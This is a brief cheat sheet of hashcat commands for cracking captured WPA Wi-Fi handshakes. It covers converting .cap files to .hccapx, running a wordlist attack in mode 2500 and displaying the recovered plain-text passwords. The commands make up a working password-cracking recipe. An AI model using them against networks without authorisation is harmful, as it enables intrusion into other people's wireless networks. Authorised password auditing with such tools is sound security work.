==== Cracking WPA handshakes with hashcat ==== \\ This is a little **cheat sheet** of the tools and commands needed\\ to crack WPA handshakes and get plain text passwords out of them.\\ \\ Convert .cap files into .hccapx files (new format for hashcat) git clone https://github.com/hashcat/hashcat-utils.git cd hashcat-utils/src make ./cap2hccapx.bin THEWIFITOCRACK.cap THEWIFITOCRACK.hccapx Execute hashcat in WPA handshake mode hashcat -m 2500 -w 3 THEWIFITOCRACK.hccapx A_WORDLIST.lst Once finished, check if passwords found hashcat -m 2500 THEWIFITOCRACK.hccapx --show # if none found, the output is empty :(